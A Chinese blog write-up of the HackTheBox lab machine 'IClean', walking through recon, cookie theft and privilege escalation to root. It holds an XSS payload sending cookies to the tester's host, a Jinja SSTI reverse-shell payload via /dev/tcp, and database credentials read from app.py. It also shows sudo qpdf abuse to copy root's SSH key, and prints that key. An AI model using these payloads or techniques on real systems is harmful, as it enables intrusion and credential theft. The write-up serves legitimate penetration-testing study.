HackTheBox--IClean

IClean测试过程

1 信息收集

NMAP端口扫描

在这里插入图片描述

80端口测试

echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts

检查页面功能,除了 login 页面无其他可能利用点,可以尝试进行目录爆破和子域名扫描

在这里插入图片描述

目录扫描

./gobuster dir -u http://capiclean.htb/ -w directory-list-2.3-small.txt

在这里插入图片描述

目录爆破发现如上接口,在 http://capiclean.htb/quote ,可以输入邮箱地址,能够进行用户输入的位置,那可以进行注入等漏洞探测

在这里插入图片描述


2 漏洞测试

XSS漏洞

勾选服务,输入邮件地址抓包进行观察,勾选服务之后,会通过邮件通知所选择的服务,service 参数的内容可以被邮件响应,那就可以测试 service 参数处是否存在 XSS 漏洞,以此获取 cookie
在这里插入图片描述

本地开启 http.server 服务,发送如下 payload,本地服务器成功获取到响应,payload 执行成功

<img+src%3d"http%3a//10.10.14.171%3a8081"%3b>

在这里插入图片描述

写入XSS 脚本获取 cookie,URL 编码后请求,成功获取到 cookie

<img src=x onerror=fetch("http://10.10.14.171:8081/"+document.cookie);>

在这里插入图片描述

SSTI 漏洞

替换 cookie 访问网站,在 /dashboard 下,Flask 的 Jinja 模板库在后台渲染模板,易导致 SSTI 漏洞

在这里插入图片描述

SSTI 漏洞攻击流程

1.Generating Invoice,生成Invoice id Generator,添加到Generate QR,生成一个发票链接,

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.在请求发票链接时,抓包对 qr_link 参数进行注入,输入漏洞 paylaod {{4*4}},成功响应 4*4 的乘积 49,存在 SSTI 漏洞

在这里插入图片描述

3.漏洞利用

利用 SSTI 漏洞反弹 shell,对 payload 进行 URL 编码,成功获取到 www-data 权限

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash -c '/bin/bash -i >& /dev/tcp/10.10.14.171/4444 0>&1'")|attr("read")()}}

在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

在这里插入图片描述


3 横向移动

检查当前用户权限下文件,在/opt/app 路径下发现 app.py 文件存在 mysql 数据库配置文件,成功获取到数据库账号密码:

'host': '127.0.0.1',
'user': 'iclean',
'password': 'pxCsmnGLckUb',
'database': 'capiclean'

在这里插入图片描述

mysql -u iclean -p

在这里插入图片描述

select * from capiclean.users;

检查 capiclean 数据库 users 表,发现用户 amdin,consuela 及密码 hash

在这里插入图片描述

破解hash 密码,consuela 用户的密码为:simple and clean
在这里插入图片描述

ssh 连接,成功获得 consuela 用户权限

在这里插入图片描述

在这里插入图片描述


4 权限提升

# 检查当前用户拥有的权限
sudo -l

所有用户都可以执行 /usr/bin/qpdf

在这里插入图片描述

点击查看qpdf 工具文档

--add-attachment 指定想要复制其内容的文件
--empty 指定想要粘贴此内容的文件

和 cp 命令类似

在这里插入图片描述
在这里插入图片描述

获取 root 用户的 ssh 私钥并将其写入名为 id_rsa 的文件中,然后通过 root 用户的私钥进行 ssh 登录,成功获取到 root 权限

sudo /usr/bin/qpdf --qdf --add-attachment /root/.ssh/id_rsa -- --empty ./id_rsa

在这里插入图片描述

在这里插入图片描述

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.12

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值